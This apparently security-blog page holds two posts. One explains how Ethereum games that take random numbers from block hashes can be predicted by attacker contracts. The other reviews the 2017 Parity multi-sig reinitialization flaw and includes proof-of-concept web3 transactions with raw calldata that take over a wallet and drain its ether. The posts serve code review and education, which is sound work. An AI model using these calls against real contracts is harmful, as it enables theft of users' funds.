Search
RSS Feed
Twitter

Entries in ethereum (2)

Friday
Jun012018

Breaking Randomness in the Ethereum Universe [part 1]

It is widely acknowledged that generating secure random numbers on the Ethereum blockchain is difficult due to its deterministic nature. Each time a smart contract’s function is called inside of a transaction, it must be replayed and verified by the rest of the network. This is crucial so that it is not possible for a miner to manipulate the internal state during execution and modify the result for their own benefit. For example, if the Ethereum Virtual Machine (EVM) provided functionality to generate a random number using a cryptographically secure random source on the miner’s system, it would not be possible to confirm that the random number generated had not been manipulated by the miner. Another more important reason however, is that this would not be determinsitic and if ether is transferred or alternative code paths are taken based on decisions made inside the function as a result of the generated number, the contract’s ether balance and storage state may be inconsistent with the view of the rest of the network.

This post is the first in a three-part series where we will look at some of the techniques developers are using to generate numbers that appear to be random in the deterministic Ethereum environment, and look at how it is possible in-practice to exploit these random number generators for our advantage. Our first post will focus on generating random numbers on-chain and what the security implications of doing so are. In the remaining two posts we will review another two commonly used techniques including using oracles and participatory schemes where numbers are provided via multiple participants.

Sources of Entropy in Ethereum

We have proposed that we cannot trust a single miner to generate a “high quality” random number for our smart contract and that if a “random” number is produced, the same number must be produced when other nodes of the network execute the smart contract code for verification. One method that is commonly used is the use of a Pseudorandom Number Generator (PRNG), which will produce a series of bytes that look random in a deterministic way, based on an initial private seed value and internal state.

The Ethereum blockchain provides a number of block properties that are not controllable by a single user of the network and are only somewhat controllable by miners, such as the timestamp and coinbase. When using these block properties as a source of entropy for an initial seed to a PRNG, it may well look sufficient as the output appears to look random and the seed value cannot be directly manipulated by users of the smart contract.

The following block variables are commonly used when generating random numbers on-chain:

  • block.blockhash(uint blockNumber): hash of the given block (only works for 256 most recent blocks excluding current)

  • block.number: current block number

  • block.coinbase: current block miner’s address

  • block.timestamp: current block timestamp as seconds since unix epoch 

The main advantages of using block properties as a seed for randomness is they are simple to implement and the resulting random numbers are immediately available to the smart contract. This simplicity, speed and lack of dependence on external parties or systems makes the use of block properties a desirable option. It is often assumed that when using block properties as a source of randomness, only miners would be in a position to cheat. For example, if the output number did not work in their favour, they can throw away the block and wait for a new block whereby the generated number worked in their favour. 

With the assumption that only miners are able to exploit the number generation using block properties as a seed, there are multiple blog posts, Reddit posts, and Stack Overflow threads regarding when it is safe to use these properties for random number generation. These often incorrectly state that it is acceptable to use block properties only when the potential payout is less than the mining reward, as it would not be beneficial for a malicious miner to throw out the block. However, this is not case, as we will see when we analyse and exploit the vulnerable smart contracts below.

Exploiting a Simple Number Guessing Smart-Contract

Firstly we will look a naïve, yet not uncommon implementation using the block.blockhash property. The GuessingGame smart contract allows the participant to guess a randomly generated number. If the participant guesses correctly they win twice their initial bet.

If we look at the badRandom function, we can see how the random number is generated by casting the blockhash of the previous block to an unsigned integer, then performing a modulus operation:

This will appear to provide a random value between 1 and 10 (unfortunately this also introduces a modulo bias meaning that some values are more likely than others). As the previous block number is not controllable by an attacker it cannot be manipulated to produce a random number in the attackers favour… however, the seed is known to the attacker. It is therefore possible to predict what the next winning number will be and beat the house. One potential problem with this approach, is that the attacker needs to take the current block number, get the blockhash, generate the next number and make sure their bet was placed in the very next block. 

This isn’t very feasible to do manually, however we can get around this by calculating the next winning number on-chain, then make an external contract call to the GuessingGame with the correct number. The following attacker contract will always predict the winning number when the cheat() function is called.

Another Vulnerable ‘Lottery’ Style Game

The above contract will allow us to always take away the winnings, however, can we still exploit this type of random number generation when the generation takes place at some point in the future? To explore this, we have the following lottery style smart contract where participants can buy a ticket in a draw. When enough tickets have been sold a winner can be selected. A common, but problematic, coding pattern is shown below:

By looking at the buyTicket function below, there is nothing the attacker can control when buying a ticket, other than waiting for specific tickets to be sold and buying theirs at a specific point, such as waiting for 2 to be sold and then attempting to purchase the 3rd.

Lets now look at how the winning ticket is chosen:

Firstly, there is a require statement to ensure that the winner can only be chosen once the required number of tickets have been sold. If this requirement is met the sale is over and a random number is generated. In this case we have no control over what the winnerIndex will be, however we can calculate who the winner will be before invoking the drawWinner() function. Allowing the attacker to wait until a blockhash is used that generates a random number making the attacker the winner.

The problem with this approach is that the attacker needs to know which ticket they have, or at which index in the drawParticipants array their account address is located. Within the blockchain, even private variables are readable by everyone, even if the contract does not directly expose them. The web3.eth.getStorageAt(contractAddress, index) method can be used to look into the contracts persistent storage and identify which ticket is the attackers.

The attacker contract below will take the desired winner index, then calculate if that index is going to win the draw during the current block. If the desired winner is going to be selected, the drawWinner() function is called and the attacker takes home the contract balance. If the attacker is not going to win, the call returns before drawing the winner. The attacker just needs to repeatedly call the cheat(winnerIndex) function until the blockhash outputs a number that results in the correct winner. It is true that this process is going to cost the attacker in transaction fees for each repeated call, however this is likely to be negligible when compared to a games payout.

The primary drawback with this approach is that if the drawWinner() function is called by another participant, then the next winner may be chosen at a blocknumber which does not result in the attacker winning. Another issue is that depending on the number of participants, the attacker may need to submit a large number of transactions before they are chosen.

A partial mitigation?

As games are typically designed to be played by real players, rather than other smart contracts, we could look to identify whether the player’s address is a regular Externally Controlled Account (EOA) or a smart contract account. It appears this can currently be achieved by using inline assembly and the EXTCODESIZE opcode, which returns the size of the CODE property of an external Ethereum account using its address. For example, this could be implemented with the following:

This will restrict specific functions from only being called from Externally Owned Accounts and therefore mitigate the attacks outlined above. However, this does not mitigate against attacks from malicious miners and will likely break under future accounts created under the Ethereum account abstraction proposed in EIP-86 which is scheduled for Constantinople Metropolis stage 2.

The practise of generating pseudo-random numbers using block properties is highly discouraged. We have looked at how an attacker can actually exploit such PRNG implementations via external contract calls, which allow an attacker to predict the next number to be generated in the same block. Whilst a partial mitigation does exist to prevent the specific attacks mentioned, block properties and on-chain data are always public and therefore carry the risk that an attacker may be able to predict the winning number and use it for their advantage.    

In the following two parts of this series, we will analyse the use of generating random numbers using participatory schemes where numbers are provided via multiple participants, and through the use of external sources of randomness that are consumed via the use of Oracles.


Wednesday
Sep272017

Reviewing Ethereum Smart Contracts

Ethereum has been in the news recently due to a string of security incidents affecting smart contracts running on the platform. As a security engineer, these stories piqued my interest and I began my own journey down the rabbit hole that is Ethereum “dapp” (decentralized application) development and security. I think it is a fascinating technology with some talented engineers pushing the boundaries of what is possible in an otherwise trustless network. The community has also begun to mature, as projects have started bug bounties, security best practices have been published, and vulnerabilities in the technology itself have been patched.

Still, if Ethereum’s popularity is to continue to grow, I believe that it is going to need the help of the wider security industry. And therein is a problem. Most security engineers still don’t know what Ethereum even is, let alone how to perform a security review of an application running on it.

As it turns out, there are some pretty big similarities between traditional code review and Ethereum smart contract review. This is because smart contracts are functionally just ABI (application binary interface) services. They are similar to the very API services that many security engineers are accustomed to reviewing, but use a binary protocol and set of conventions specific to Ethereum. Unsurprisingly, these details are also what make Ethereum smart contracts prone to several specific types of bugs, such as those relating to function reentrancy and underflows. These vulnerabilities are important to understand as well, although they are a bit more advanced and best suited for another blog post.

Let us take a look at a case study to examine the similarities between traditional code review and smart contract review.

A Case Study: The Parity “Multi-Sig” Vulnerability

On July 19, 2017, a popular Ethereum client named Parity was found to contain a critical vulnerability that lead to the theft of $120MM. Parity allows users to setup wallets that can be managed by multiple parties, such that some threshold of authorized owners must sign a transaction before it is executed on the network. Because this is not a native feature built into the Ethereum protocol, Parity maintains its own open source Ethereum smart contract to implement this feature. When a user wants to create a multi-signature wallet, they actually deploy their own copy of the smart contract. As it turned out, Parity’s multi-signature smart contract contained a vulnerability that, when exploited, allowed unauthorized users to rob a wallet of all of its Ether (Ethereum’s native cryptocurrency).

Parity’s multi-signature wallet is based off of another open source smart contract that can be found here. Both are written in Solidity, which is a popular Ethereum programming language. Solidity looks and feels a lot like JavaScript, but allows developers to create what are functionally ABI services by making certain functions callable by other agents on the network. An important feature of the language is that ABI functions are publicly callable by default, unless they are marked as “private” or “internal”.

In December of 2016, a redesigned version of the multi-signature wallet contract was added to Parity’s GitHub repository with some considerable changes. The team decided to refactor the contract into a library. This meant that calls to individual multi-signature wallets would actually be forwarded to a single, hosted library contract. This implementation detail wouldn’t be obvious to a caller unless they examined the code or ran a debugger.

Unfortunately, it is during this refactor that a critical security vulnerability was introduced into the code base. When the contract code was transformed into a single contract (think class in object-oriented programming), all of the initializer functions lost the important property of initialization: Only being callable once. It was therefore possible to re-call the contract’s initialization function even after it had already been deployed and initialized, and change the settings of the contract.

How can attacks like the one on Parity’s contract be avoided? As it turns out, the vulnerability would have likely been caught by a short code review.

Profiling Solidity Functions

As I mentioned, Ethereum smart contracts are functionally just ABI services. One of the first things we do as security engineers when reviewing an application is to map out which endpoints we have authorization (intentionally or unintentionally) to interact with.

We can easily do this for a Solidity application using a tool I wrote called the Solidity Function Profiler. Let’s run it on a vulnerable version of the multi-signature contract described earlier, looking for visible (public or external) functions that aren’t constants (possibly state changing) and don’t use any modifiers (which may be authorization checks). If we were looking for new vulnerabilities, we would obviously apply much more scrutiny to the output of the tool. For the sake of this blog post, simply looking for functions that fit the above criteria is adequate.

For those who want to follow along at home, a vulnerable version of the contract code can be found here. This is the code that we will be referencing throughout the rest of this blog post.

Four functions fit this criteria and have been bolded in the table below.

Contract Function Visibility Constant Returns Modifiers
WalletLibrary () public false
payable
WalletLibrary initMultiowned(address,uint) public false

WalletLibrary revoke(bytes32) external false

WalletLibrary changeOwner(address,address) external false
onlymanyowners
WalletLibrary addOwner(address) external false
onlymanyowners
WalletLibrary removeOwner(address) external false
onlymanyowners
WalletLibrary changeRequirement(uint) external false
onlymanyowners
WalletLibrary getOwner(uint) external true address
WalletLibrary isOwner(address) public true bool
WalletLibrary hasConfirmed(bytes32,address) external true bool
WalletLibrary initDaylimit(uint) public false

WalletLibrary setDailyLimit(uint) external false
onlymanyowners
WalletLibrary resetSpentToday() external false
onlymanyowners
WalletLibrary initWallet(address,uint,uint) public false

WalletLibrary kill(address) external false
onlymanyowners
WalletLibrary execute(address,uint,bytes) external false o_hash onlyowner
WalletLibrary create(uint,bytes) internal false o_addr
WalletLibrary confirm(bytes32) public false o_success onlymanyowners
WalletLibrary confirmAndCheck(bytes32) internal false bool
WalletLibrary reorganizeOwners() private false

WalletLibrary underLimit(uint) internal false bool onlyowner
WalletLibrary today() private true uint
WalletLibrary clearPending() internal false

Wallet Wallet(address,uint,uint) public false

Wallet () public false
payable
Wallet getOwner(uint) public true address
Wallet hasConfirmed(bytes32,address) external true bool
Wallet isOwner(address) public true bool

Call Delegation

All four identified functions are found in the contract’s library, meaning that we may not be able to reach them because the main Wallet contract doesn’t expose them. However, a quick read of the source code reveals the use of a call forwarding pattern that delegates calls made to the Wallet contract to the WalletLibrary contract. This is done via a fallback function, which is a special function that gets called when no matching function is found during a call or when Ether is sent to a contract. With this information we know that these functions can be called.

395: contract Wallet is WalletEvents {
[..snip..]
423:   // gets called when no other function matches
424:   function() payable {
425:     // just being sent some cash?
427:     if (msg.value > 0)
428:       Deposit(msg.sender, msg.value);
429:     else if (msg.data.length > 0)
430:       _walletLibrary.delegatecall(msg.data);
431:   }

This call delegation pattern is typically discouraged due to the security implications it can pose when calling external, untrusted contracts. In this case the delegatecall function is used to proxy calls to what would be a trusted library contract, so while it is a bad practice it isn’t an active issue here. If the contract’s developers had been more explicit about what calls were allowed to be delegated by this function, the vulnerability may have never existed. However, the delegation itself is not the direct cause of the vulnerability, and continues to exist even in the patched version of this contract.

The Vulnerability: Wallet Reinitialization

If we look at the source code associated with the four functions listed above, we discover that the revoke function performs an authorization check. However, the remaining three functions don’t perform such a check and seem like they might be quite interesting. For example, the initMultiowned function sets the contract’s list of owners and the number of signatures required to perform transactions:

105:   // constructor is given number of sigs required to do protected "onlymanyowners" transactions
106:   // as well as the selection of addresses capable of confirming them.
107:   function initMultiowned(address[] _owners, uint _required) {
108:     m_numOwners = _owners.length + 1;
109:     m_owners[1] = uint(msg.sender);
110:     m_ownerIndex[uint(msg.sender)] = 1;
111:     for (uint i = 0; i < _owners.length; ++i)
112:     {
113:       m_owners[2 + i] = uint(_owners[i]);
114:       m_ownerIndex[uint(_owners[i])] = 2 + i;
115:     }
116:     m_required = _required;
117:   }

The initDaylimit function changes the daily limit on the amount of Ether that is allowed to be transacted:

200:   // constructor - stores initial daily limit and records the present day's index.
201:   function initDaylimit(uint _limit) {
202:     m_dailyLimit = _limit;
203:     m_lastDay = today();
204:   }

The initWallet function simply calls the two functions described above, passing them the function’s own arguments as wallet settings:

214:   // constructor - just pass on the owner array to the multiowned and
215:   // the limit to daylimit
216:   function initWallet(address[] _owners, uint _required, uint _daylimit) {
217:     initDaylimit(_daylimit);
218:     initMultiowned(_owners, _required);
219:   }

All of this makes sense so far, as these functions are used to initialize the state of a new wallet. However, what are these functions used for once the wallet is initialized? What would stop them from simply being re-called and overwriting the wallet’s settings?

The answer to both questions is nothing. These functions are intended to only be called once by the original owner, but there isn’t anything enforcing this. There are no authorization checks, no visibility specifiers to make the functions internal, and not a single check to make sure that the wallet hasn’t been initialized already.

This is the root cause of the vulnerability. These functions are public and state changing, and we’ve discovered this using the Solidity Function Profiler and a bit of manual code review.

Proof of Concept Reproduction

The attacker’s exploit code may have looked something like this (using the Web3 JavaScript API):

// "Reinitialize" the wallet by calling initWallet
web3.eth.sendTransaction({from: attacker, to: victim, data: "0xe46dcfeb0000000000000000000000000000000000000000000000000000000000000060000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000" + attacker.slice(2,42)}); 

// Send 100 ETH to the attacker by calling execute 
web3.eth.sendTransaction({from: attacker, to: victim, data: "0xb61d27f6000000000000000000000000" + attacker.slice(2,42) + "0000000000000000000000000000000000000000000000056bc75e2d6310000000000000000000000000000000000000000000000000000000000000000000600000000000000000000000000000000000000000000000000000000000000000"})

It can be a little difficult to parse out what’s going on with raw call data. Let’s break this down a bit further using a more in-depth example reproduction. Consider the following actors with the corresponding addresses:

  •  Multi-Sig Wallet Contract: 0xde6a66562c299052b1cfd24abc1dc639d429e1d6
  •  Original Owner Account: 0x14723a09acff6d2a60dcdf7aa4aff308fddc160c
  •  Second Owner Account: 0x4b0897b0513fdc7c541b6d9d7e929c4e5364d2db
  •  Attacker Account: 0xca35b7d915458ef540ade6068dfe2f44e8fa733c

The initialization of a multi-signature wallet would look something like this, where the first argument is an array of additional owner addresses, the second is the number of signatures required, and the third is a daily limit:

From Original Owner (0x14723a09acff6d2a60dcdf7aa4aff308fddc160c)
To Multi-Sig Wallet (0xde6a66562c299052b1cfd24abc1dc639d429e1d6)
Call initWallet([“0x4b0897b0513fdc7c541b6d9d7e929c4e5364d2db”], 2, 3)
Result 0x
Events none

We can see that there are now two owners, one being the original owner and the other being the second owner:

From Original Owner (0x14723a09acff6d2a60dcdf7aa4aff308fddc160c)
To Multi-Sig Wallet (0xde6a66562c299052b1cfd24abc1dc639d429e1d6)
Call m_numOwners
Result 2
Events none
From Original Owner (0x14723a09acff6d2a60dcdf7aa4aff308fddc160c)
To Multi-Sig Wallet (0xde6a66562c299052b1cfd24abc1dc639d429e1d6)
Call getOwner(0)
Result 0x14723a09acff6d2a60dcdf7aa4aff308fddc160c
Events none
From Original Owner (0x14723a09acff6d2a60dcdf7aa4aff308fddc160c)
To Multi-Sig Wallet (0xde6a66562c299052b1cfd24abc1dc639d429e1d6)
Call getOwner(1)
Result 0x4b0897b0513fdc7c541b6d9d7e929c4e5364d2db
Events none

The original owner and the second owner would then deposit funds into the wallet by sending the contract Ether (which would actually call the fallback function, which gets called when Ether is sent).

We can confirm that attempting to make a privileged call (any function using the onlymanyowners modifier) as an owner does generate a confirmation event. For example, attempting to execute a transaction above the daily limit (expressed as Wei in the call, rather than Ether) generates a confirmation event as well as a confirmationRequired event. This is expected since an additional signature is required:

From Original Owner (0x14723a09acff6d2a60dcdf7aa4aff308fddc160c)
To Multi-Sig Wallet (0xde6a66562c299052b1cfd24abc1dc639d429e1d6)
Call execute(“0xdd870fa1b7c4700f2bd7f44238821c26f7392148”, “1000000000000000000”, [])
Result 0x9bf4e669ac38b35d36c7b4574788577b908799d493ef63f40037afd6933c7be1
Events Confirmation[
 “0x14723a09acff6d2a60dcdf7aa4aff308fddc160c”,
 “0x9bf4e669ac38b35d36c7b4574788577b908799d493ef63f40037afd6933c7be1”
]

ConfirmationNeeded[
 “0x9bf4e669ac38b35d36c7b4574788577b908799d493ef63f40037afd6933c7be1”,
 “0x14723a09acff6d2a60dcdf7aa4aff308fddc160c”,
 “4”,
 “0x0”,
 “0x”
]

We can also confirm that attempting to make a multi-signature call as the attacker results in no execution or event generation, as the attacker’s address isn’t in the map of owner addresses. The call fails immediately:

From Attacker (0xca35b7d915458ef540ade6068dfe2f44e8fa733c)
To Multi-Sig Wallet (0xde6a66562c299052b1cfd24abc1dc639d429e1d6)
Call execute(“0xca35b7d915458ef540ade6068dfe2f44e8fa733c”, “1000000000000000000”, [])
Result 0x0000000000000000000000000000000000000000000000000000000000000000
Events none

Now that we have a baseline for expected contract behavior, let’s break it by simply “reinitializing” the contract as the attacker. We give the function an array of owner addresses containing just the attacker’s address. This actually sets two owner addresses (both being the attacker’s), since the contract uses the sender’s address as well as the list of supplied owner addresses. This is an important detail for an attacker to consider, because the initWallet function doesn’t ensure that all previous owners are removed (and therefore locked out of the wallet). The side effect of calling the initWallet function again that is being exploited here is that it overwrites the first N elements of the owner address map, where N is the length of our supplied list of owner addresses:

From Attacker (0xca35b7d915458ef540ade6068dfe2f44e8fa733c)
To Multi-Sig Wallet (0xde6a66562c299052b1cfd24abc1dc639d429e1d6)
Call initWallet([“0xca35b7d915458ef540ade6068dfe2f44e8fa733c”], 1, 0)
Result 0x
Events none

Querying the contract again for the first owner, we now get:

From Attacker (0xca35b7d915458ef540ade6068dfe2f44e8fa733c)
To Multi-Sig Wallet (0xde6a66562c299052b1cfd24abc1dc639d429e1d6)
Call getOwner(0)
Result 0xca35b7d915458ef540ade6068dfe2f44e8fa733c
Events none
From Attacker (0xca35b7d915458ef540ade6068dfe2f44e8fa733c)
To Multi-Sig Wallet (0xde6a66562c299052b1cfd24abc1dc639d429e1d6)
Call getOwner(1)
Result 0xca35b7d915458ef540ade6068dfe2f44e8fa733c
Events none

We can also see that the number of required owners has also been successfully changed. The daily limit is irrelevant in this case because the contract ignores it if only 1 signature is required.

From Attacker (0xca35b7d915458ef540ade6068dfe2f44e8fa733c)
To Multi-Sig Wallet (0xde6a66562c299052b1cfd24abc1dc639d429e1d6)
Call m_required
Result 1
Events none

At this point it is trivial for the attacker to steal all of the funds in the wallet. The attacker is an owner and only one signature is required. The returned 0 indicates that there is no associated ConfirmationNeeded data, and that the contract has paid out:

From Attacker (0xca35b7d915458ef540ade6068dfe2f44e8fa733c)
To Multi-Sig Wallet (0xde6a66562c299052b1cfd24abc1dc639d429e1d6)
Call execute(“0xca35b7d915458ef540ade6068dfe2f44e8fa733c”,  “100000000000000000000”, [])
Result 0x0000000000000000000000000000000000000000000000000000000000000000
Events SingleTransact[
 “0x14723a09acff6d2a60dcdf7aa4aff308fddc160c”,
  “100000000000000000000”,
 “0xca35b7d915458ef540ade6068dfe2f44e8fa733c”,
 “0x”,
 “0x0”
]

In this fictional example, the attacker has made off with 100 Ether (currently ~$30,000 USD).

Conclusion

Attacks involving transaction malleability, function reentrancy, and underflows all dwarf this kind of vulnerability in complexity. However, sometimes the worst vulnerabilities are hiding in plain sight rather than underhanded or buggy code.

We have seen that applying a simple code review technique of profiling an application would have likely caught this vulnerability early on. Knowledge of the Solidity language and the EVM is required, but these can be picked up by consulting documentation, known pitfalls, and open source code bases. The underlying code review methodology stays largely the same.